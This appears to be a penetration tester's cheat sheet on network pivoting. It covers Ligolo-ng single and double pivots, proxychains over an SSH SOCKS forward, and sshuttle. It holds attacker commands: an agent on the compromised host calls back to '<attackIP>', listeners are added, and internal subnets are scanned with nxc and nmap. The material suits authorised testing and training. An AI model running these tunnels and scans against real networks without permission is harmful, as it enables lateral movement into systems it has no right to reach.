Skip to content

Pivoting

LigoloNG

https://github.com/Nicocha30/ligolo-ng

Single pivot

Attack host: 

sudo ip tuntap add user kali mode tun ligolo ; sudo ip link set ligolo up

./proxy -selfcert -laddr 0.0.0.0:443
add route to new subnet 
sudo ip route add 172.16.139.0/24 dev ligolo
Target: 
agent.exe -connect <attackIP>:443 -ignore-cert
Attack host: select session 
session
add listeners 
listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
listener_add --addr 0.0.0.0:8081 --to 127.0.0.1:81
listener_add --addr 0.0.0.0:8082 --to 127.0.0.1:82
listener_add --addr 0.0.0.0:8083 --to 127.0.0.1:83
listener_add --addr 0.0.0.0:8084 --to 127.0.0.1:84
start tunnel 
start

Double Pivot

Attack host: 

sudo ip tuntap add user kali mode tun double ; sudo ip link set double up
sudo ip tuntap add user kali mode tun ligolo ; sudo ip link set ligolo up

./proxy -selfcert -laddr 0.0.0.0:443
Target: First pivot callback 
agent.exe -connect <attackIP>:443 -ignore-cert
Attack host: Add routes 
sudo ip route add 172.16.139.0/24 dev ligolo
sudo ip route add 172.16.210.0/24 dev double
select session 
session
add listener for second pivot 
listener_add --addr 0.0.0.0:139 --to 127.0.0.1:443
add normal listeners 
listener_add --addr 0.0.0.0:8080 --to 127.0.0.1:80
listener_add --addr 0.0.0.0:8081 --to 127.0.0.1:81
listener_add --addr 0.0.0.0:8082 --to 127.0.0.1:82
listener_add --addr 0.0.0.0:8083 --to 127.0.0.1:83
listener_add --addr 0.0.0.0:8084 --to 127.0.0.1:84
start first tunnel 
start
Second target: Call back to first pivot host from second 
agent.exe -connect <targetONE>:139 -ignore-cert
add listeners to second host 
listener_add --addr 0.0.0.0:5050 --to 127.0.0.1:50
listener_add --addr 0.0.0.0:5051 --to 127.0.0.1:51
listener_add --addr 0.0.0.0:5052 --to 127.0.0.1:52
listener_add --addr 0.0.0.0:5053 --to 127.0.0.1:53
listener_add --addr 0.0.0.0:5054 --to 127.0.0.1:54
start second tunnell 
start --tun double
Verify access 
nxc smb 172.16.139.10/24 
nxc smb 172.16.210.0/24

proxychains (with SOCKS tunnel)

Start with dynamic SSH port forward 

ssh -D 9050 user@<jumpIP>
Check proxychains configuration 
cat /etc/proxychains.conf
or
cat /etc/proxychains4.conf
Ensure its configured to route over the local forward 
# meanwile
# defaults set to "tor"
socks4  127.0.0.1 9050
prepend proxychains or proxychains4 to any command to tunnel the traffic 
proxychains nmap
proxychain msfconsole
proxychains firefox

we can only perform a full TCP connect scan over proxychains. The reason for this is that proxychains cannot understand partial packets. If you send partial packets like half connect scans, it will return incorrect results

proxychains nmap -v -Pn -sT <internalIP>

sshuttle

https://github.com/sshuttle/sshuttle

specify the option -r to connect to the remote machine with a username and password. Then we need to include the network or IP we want to route through 

sudo sshuttle -r user@<jumpHost> 172.16.5.0/23 -v
sshuttle creates an entry in our iptables to redirect all traffic to the 172.16.5.0/23 network through the pivot host. We can now use any tool directly without using proxychains. 
nmap -v -sV 172.16.5.19 -A -Pn